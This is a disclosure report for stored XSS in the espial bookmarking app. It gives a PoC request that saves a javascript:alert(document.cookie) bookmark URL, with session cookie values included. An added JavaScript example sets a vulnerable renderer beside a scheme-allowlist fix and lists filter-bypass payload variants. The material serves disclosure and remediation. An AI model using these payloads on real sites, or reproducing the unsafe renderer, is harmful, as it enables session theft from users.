Cross-site Scripting (XSS) - Stored in jonschoning/espial
Valid
Reported on
Sep 27th 2021
Description
Stored XSS via a javascript: URL submitted in the url field of a bookmark (POST /api/add) and later rendered as a link
Proof of Concept
// PoC request
POST /api/add HTTP/2
Host: esp.ae8.org
Cookie: _SESSION=SilFBialwul9V05BatfVPoUjOf0Klq8Ys0C/kWXvt6o2hKA8gHSKuInA6GCizZLuYIVindIkEq5wUOys/exSV06ByNuR6duw/qBMVA2BMC6evD1k/6RQLCjxm2AXjCJBjEU1jiXW/ZtTBdZyNhwPHI6SK4YClUoiIAfpXuUB+ysShu6Kx+8JCRK2igki/pHI6F/+nXgpt3fGW7Va9/SvIqFNzEtAmIpD0aNupcsEnpp9iG/gkml5J8HT3C0x8JMDRakuS+Em3a+6o9bkbptOS0nU9HVP5lGZsIygZXRB1w1wBE4dqVoXg21VwbARToY8VEbaJZV2CjiBQW8=; XSRF-TOKEN=dBcG59xtr68JUiaUpdwGp9pDUaszdEsgktplKRuf
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Xsrf-Token: dBcG59xtr68JUiaUpdwGp9pDUaszdEsgktplKRuf
Content-Type: application/json
Content-Length: 192
Origin: https://esp.ae8.org
Referer: https://esp.ae8.org/add?next=back
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"url":"javascript:alert(document.cookie)","toread":true,"title":"1234","time":null,"tags":"xss","slug":null,"selected":null,"private":true,"description":"902903","bid":null,"archiveUrl":null}
The stored bookmark's url field is rendered as a clickable link, so the javascript: payload executes in the viewer's browser when that link is clicked.
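The request above stores "javascript:alert(document.cookie)" as a bookmark URL, and the page later emits it as an href. The following is an added example, not espial's own code (espial is a Haskell/PureScript project; this is written in JavaScript to show the browser-side behaviour), contrasting a rendering function that trusts the stored url field with one that allowlists URL schemes before building the link. Function names, the SAFE_SCHEMES set and the sample inputs are assumptions constructed for the example. It goes slightly beyond the single PoC payload: the samples include case, whitespace and embedded-newline variants that a naive "starts with javascript:" check would miss but that browsers still execute.

```javascript
// Added example (not espial's own code): scheme allowlist for bookmark URLs.
// The stored-XSS report above works because the "url" field is emitted as an
// <a href> without any check on its scheme.

// Schemes that are safe to place in an href. Hypothetical policy for this example.
const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Returns the normalized URL if it may be used as an href, otherwise null.
// Parsing with the WHATWG URL parser (rather than a regex) matters: the parser
// strips leading/trailing whitespace and embedded tab/newline characters and
// lower-cases the scheme, so " JaVa\nScRiPt:alert(1)" normalizes to the scheme
// "javascript:" and is rejected the same way a browser would interpret it.
function safeHref(raw) {
  if (typeof raw !== "string") return null;
  let parsed;
  try {
    parsed = new URL(raw); // no base URL: relative input throws and is rejected
  } catch {
    return null;
  }
  if (!SAFE_SCHEMES.has(parsed.protocol)) return null;
  return parsed.href;
}

// Minimal HTML escaping for text nodes and attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Vulnerable rendering: the stored url goes straight into the href.
function renderBookmarkUnsafe(bookmark) {
  return `<a href="${bookmark.url}">${escapeHtml(bookmark.title)}</a>`;
}

// Hardened rendering: scheme allowlist plus attribute escaping. A rejected URL
// still shows the bookmark title, but as plain text rather than a link.
function renderBookmark(bookmark) {
  const href = safeHref(bookmark.url);
  const title = escapeHtml(bookmark.title);
  if (href === null) {
    return `<span>${title}</span>`;
  }
  return `<a href="${escapeHtml(href)}">${title}</a>`;
}

// Constructed samples: the url from the PoC body, plus variants that a
// prefix-match check would miss, and one legitimate URL from the report.
const SAMPLES = [
  "javascript:alert(document.cookie)",
  "JaVaScRiPt:alert(1)",
  " javascript:alert(1)",
  "java\nscript:alert(1)",
  "data:text/html,<script>alert(1)</script>",
  "https://esp.ae8.org/add?next=back",
];

// Classify every sample; used below and by the checks at the end of the page.
function classifySamples() {
  return SAMPLES.map((url) => ({ url, href: safeHref(url) }));
}

for (const { url, href } of classifySamples()) {
  console.log(JSON.stringify(url), "->", href === null ? "REJECTED" : href);
}
console.log(renderBookmarkUnsafe({ url: SAMPLES[0], title: "1234" }));
console.log(renderBookmark({ url: SAMPLES[0], title: "1234" }));
```

The allowlist is deliberately a set of schemes rather than a denylist of "javascript:" and "data:": any scheme not on the list (vbscript:, blob:, custom handlers) is rejected by default, and the normalization done by the URL parser closes the case and whitespace tricks shown in the samples.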
Impact
This vulnerability allows stored XSS: the javascript: URL is persisted with the bookmark and runs in the browser of a user who clicks the link, which the PoC demonstrates by reading document.cookie.
We have contacted a member of the jonschoning/espial team and are waiting to hear back